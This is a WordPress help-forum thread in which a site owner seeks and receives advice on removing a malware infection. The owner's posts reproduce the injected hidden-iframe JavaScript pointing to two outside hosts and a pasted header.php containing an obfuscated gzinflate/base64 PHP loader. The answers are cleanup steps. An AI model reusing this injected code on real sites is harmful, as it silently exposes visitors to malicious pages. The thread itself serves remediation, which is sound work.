Ask your WordPress questions! Pay money and get answers fast! Comodo Trusted Site Seal
Official PayPal Seal

Word press error: oxsanasiberians WordPress

  • SOLVED

Can anyone advise how to remove this - webmaster report

<script type="text/javascript">
document.write('<iframe src="http://oxsanasiberians.com/down
loads/stats.php" name="Twitter" scrolling="auto" frameborder
="no" align="center" height="2" width="2"></iframe>');
</script>

my website is www.rssigns.co.uk


Update:
The code has now changed to on webmaster.

<script type="text/javascript">
document.write('<iframe src="http://poseyhumane.org/stats.ph
p" name="Twitter" scrolling="auto" frameborder="no" align="c
enter" height="2" width="2"></iframe>');
</script>

The WP security has now been installed.

Answers (6)

2012-07-08

Agus Setiawan answers:

hello,

you should remove .htaccess file on root wp installation ( why? because the virus/malware has injecting this file with another codes ), and make a new .htaccess file with this value ( standart wordpress .htaccess file ) :

# BEGIN WordPress
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
</IfModule>
# END WordPress

hope this help.

thanks

2012-07-09

Sabby Sam answers:

Login into Wordpress wp admin. Then go to Appereance - > Editor - > header.php.
By default it open the style.css, you need to click on header.php which is given on the right side.
click on header.php and once you open this file after the line 10 to 15 you will find this code.
So you need to just delete this lines and cick on update button which will save this file. Your web site is safe from malware effect.
If you still seems this error then it is effected in your theme files as well so you need to hire a developer who will search each and everything file and solve it. Try to check the .htaccess files and don't allow to give the write permission. Do use the WP security Wordpress plugin it will help you not to get some error again.

If you want to remove from google search then login into google webmaster tool.
You will find health on right side just click on that and then click on request a review.
You are done and even you can see this article for better understanding http://support.google.com/webmasters/bin/answer.py?hl=en&answer=168328.
I hope this make sense.

Hi,
No Saghir in your header.php you will find some similar code like this
"<script type="text/javascript">
document.write('<iframe src="http://oxsanasiberians.com/down
loads/stats.php" name="Twitter" scrolling="auto" frameborder
="no" align="center" height="2" width="2"></iframe>');
</script>
"
in line number between 15 to 25. If you dont understand then paste your header.php code.
Thank you


Saghir comments:

Hi Sabby my header.php reads: line 10 - 15

bloginfo('name');
$site_description = get_bloginfo('description', 'display');
if ( $site_description && ( is_home() || is_front_page()))
echo " | $site_description";
if ($paged >= 2 || $page >= 2)

Are these the lines that need to be removed?


Sabby Sam comments:


Sabby Sam comments:


Sabby Sam comments:


Saghir comments:

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="<?php bloginfo('text_direction'); ?>" xml:lang="<?php bloginfo('language'); ?>">
<head>
<meta http-equiv="Content-Type" content="<?php bloginfo('html_type'); ?>; charset=<?php bloginfo('charset'); ?>" />
<title><?php
global $page, $paged;
wp_title('|', true, 'right');
bloginfo('name');
$site_description = get_bloginfo('description', 'display');
if ( $site_description && ( is_home() || is_front_page()))
echo " | $site_description";
if ($paged >= 2 || $page >= 2)
echo ' | ' . sprintf( __('Page %s'), max($paged, $page));

?></title>
<link rel="shortcut icon" href="<?php bloginfo('template_url'); ?>/i/favico.ico" type="image/x-icon" />
<meta http-equiv="Content-language" content="<?php bloginfo('language'); ?>" />
<link rel="profile" href="http://gmpg.org/xfn/11" />
<link rel="stylesheet" type="text/css" media="all" href="<?php bloginfo( 'stylesheet_url' ); ?>" />
<!--[if IE]><link rel="stylesheet" type="text/css" media="all" href="<?php bloginfo('template_url'); ?>/ie.css" /><![endif]-->
<link rel="pingback" href="<?php bloginfo( 'pingback_url' ); ?>" />
<link rel="alternate" type="application/rss+xml" title="RSS 2.0" href="<?php bloginfo('rss2_url'); ?>" />
<link rel="alternate" type="text/xml" title="RSS .92" href="<?php bloginfo('rss_url'); ?>"/>
<link rel="alternate" type="application/atom+xml" title="Atom 0.3" href="<?php bloginfo('atom_url'); ?>" />
<?php
wp_enqueue_script('jquery');
if ( is_singular() ) wp_enqueue_script('slideshow', get_template_directory_uri() . '/js/jquery.cycle.all.min.js', 'jquery', false);
wp_enqueue_script('lazyload', get_template_directory_uri() . '/js/jquery.lazyload.mini.js', 'jquery', false);
wp_enqueue_script('script', get_template_directory_uri() . '/js/script.js', 'jquery', false);
?>
<?php
#c3284d#
echo(gzinflate(base64_decode("JY5NDsIgEIX3Jr0DmU11UxKXCpzCCyAdAdMCGabW3l5qdy9f3p+qjmJhwVtBDYxflm/7sQcF053G7JYZEw8rRcZzr+KL7IyiktMQmMtNypIrbmGZbcIhk5eVLdehhAIiNa+GxxqZkUC03jxNMXkNduEM4l/2zDQiaUgN2Cn6pMG1yT0QMPrAGq4g1jhy2JVR8jhh+su9Oyl5vDU/")));
#/c3284d#
wp_head(); ?>
<?php if ( is_singular() ) : ?>
<script type="text/javascript">
jQuery(document).ready(function() {
jQuery('#show').after('<div id="show_nav">').cycle({
fx: 'fade',
speed: 500,
next: '#show',
timeout: 0,
pager: '#show_nav'
});
});
</script>
<?php endif; ?>
</head>

<script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
<script type="text/javascript" src="https://apis.google.com/js/plusone.js"></script><script type="text/javascript" src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>

<body>
<div class="wrapper">
<div class="header clear">

<h1 class="logo">
<a href="<?php bloginfo('home'); ?>/"><img src="http://www.signsluton.co.uk/wp-content/uploads/2011/12/logo.png" width="120" height="110" alt="<?php bloginfo('name'); ?>" /></a>
</h1>

<?php wp_nav_menu(array('menu' => 'Header', 'theme_location' => 'Header', 'depth' => 2, 'container' => false, 'menu_class' => 'nav jsddm', 'walker' => new extended_walker())); ?>
</div>
<div class="middle clear">


Sabby Sam comments:


Sabby Sam comments:

2012-07-08

Bogdan answers:

What I know is that here is something wrong (when you enter the url): http://oxsanasiberians.com/downloads/stats.php

What you have in the file stats.php (code for twitter?)?


Saghir comments:

http://oxsanasiberians.com/downloads/stats.php is not my code or my site? This code has been added somewhere and need to remove the code and the code that keeps adding it.


Bogdan comments:


Bogdan comments:

2012-07-08

Matthew Hunt answers:

Saghir,

In the Dashboard, go to Appearance > Editor

Then you will see files on the right that you can view. Try looking in header.php or footer.php for this bad code. If not there.. look in index.php It will only be found in .php files not .js or .css

This plugin will allow you to edit your htaccess file and remove anything bad that is found in there: http://wordpress.org/extend/plugins/wordpress-seo/

Also you may want to Install http://wordpress.org/extend/plugins/wp-security-scan/

If you do not find it anywhere then it could be code inside your posts.... There is a html tab next to the visual tab above the wordpress post editor . The html tab will allow you to see the bad code if it is found in a post. The security scan plugin will tell you where it is found.

Hope this helps!


Matthew Hunt comments:

2012-07-09

Manoj Raj answers:

Malware found in your url and your site has been blacklisted by google... <iframe src="http://poseyhumane.org/stats.php" name="Twitter" scrolling="auto" frameborder="no" align="center" height="2" width="2">

More details can be found here

http://labs.sucuri.net/db/malware/malware-entry-mwiframehd202

2012-07-09

Francisco Javier Carazo Gil answers:

Hi,

Maybe the code is into your data in database. You have to:
1. Dump data of your database
2. Find it and look in which register is it placed
3. Delete or update the register


Saghir comments:

Hi

How do i restore the Database
How Do i dump the Database?

many Thanks

Saghir